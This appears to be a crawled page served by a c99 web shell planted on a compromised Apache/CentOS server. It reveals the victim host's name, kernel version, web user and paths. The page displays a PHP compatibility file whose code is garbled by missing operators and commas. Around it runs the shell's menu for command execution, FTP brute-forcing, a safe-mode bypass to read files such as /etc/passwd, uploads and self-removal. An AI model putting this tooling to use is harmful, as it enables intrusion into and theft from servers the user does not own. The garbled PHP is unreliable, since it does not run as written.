!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/includes/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     compat.php42x.php (3.68 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/** ensure this file is being included by a parent file */
defined'_VALID_ACCESS' ) or die( 'Direct Access to this location is not allowed.' );

/**
 * Replace file_get_contents()
 *
 * @category    PHP
 * @package     PHP_Compat
 * @link        http://php.net/function.file_get_contents
 * @author      Aidan Lister <aidan@php.net>
 * @version     $Revision: 1.1 $
 * @internal    resource_context is not supported
 * @since       PHP 5
 * @require     PHP 4.0.1 (trigger_error)
 */
if (!function_exists('file_get_contents')) {
    function 
file_get_contents($filename$incpath false$resource_context null)
    {
        if (
false === $fh fopen($filename'rb'$incpath)) {
            
trigger_error('file_get_contents() failed to open stream: No such file or directory'E_USER_WARNING);
            return 
false;
        }

        
clearstatcache();
        if (
$fsize = @filesize($filename)) {
            
$data fread($fh$fsize);
        } else {
            
$data '';
            while (!
feof($fh)) {
                
$data .= fread($fh8192);
            }
        }

        
fclose($fh);
        return 
$data;
    }
}
if (!
defined('FILE_USE_INCLUDE_PATH')) {
    
define('FILE_USE_INCLUDE_PATH'1);
}

if (!
defined('FILE_APPEND')) {
    
define('FILE_APPEND'8);
}


/**
 * Replace file_put_contents()
 *
 * @category    PHP
 * @package     PHP_Compat
 * @link        http://php.net/function.file_put_contents
 * @author      Aidan Lister <aidan@php.net>
 * @version     $Revision: 1.1 $
 * @internal    resource_context is not supported
 * @since       PHP 5
 * @require     PHP 4.0.1 (trigger_error)
 */
if (!function_exists('file_put_contents')) {
    function 
file_put_contents($filename$content$flags null$resource_context null)
    {
        
// If $content is an array, convert it to a string
        
if (is_array($content)) {
            
$content implode(''$content);
        }

        
// If we don't have a string, throw an error
        
if (!is_scalar($content)) {
            
trigger_error('file_put_contents() The 2nd parameter should be either a string or an array'E_USER_WARNING);
            return 
false;
        }

        
// Get the length of date to write
        
$length strlen($content);

        
// Check what mode we are using
        
$mode = ($flags FILE_APPEND) ?
                    
$mode 'a' :
                    
$mode 'w';

        
// Check if we're using the include path
        
$use_inc_path = ($flags FILE_USE_INCLUDE_PATH) ?
                    
true :
                    
false;

        
// Open the file for writing
        
if (($fh = @fopen($filename$mode$use_inc_path)) === false) {
            
trigger_error('file_put_contents() failed to open stream: Permission denied'E_USER_WARNING);
            return 
false;
        }

        
// Write to the file
        
$bytes 0;
        if ((
$bytes = @fwrite($fh$content)) === false) {
            
$errormsg sprintf('file_put_contents() Failed to write %d bytes to %s',
                            
$length,
                            
$filename);
            
trigger_error($errormsgE_USER_WARNING);
            return 
false;
        }

        
// Close the handle
        
@fclose($fh);

        
// Check all the data was written
        
if ($bytes != $length) {
            
$errormsg sprintf('file_put_contents() Only %d of %d bytes written, possibly out of free disk space.',
                            
$bytes,
                            
$length);
            
trigger_error($errormsgE_USER_WARNING);
            return 
false;
        }

        
// Return length
        
return $bytes;
    }
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0185 ]--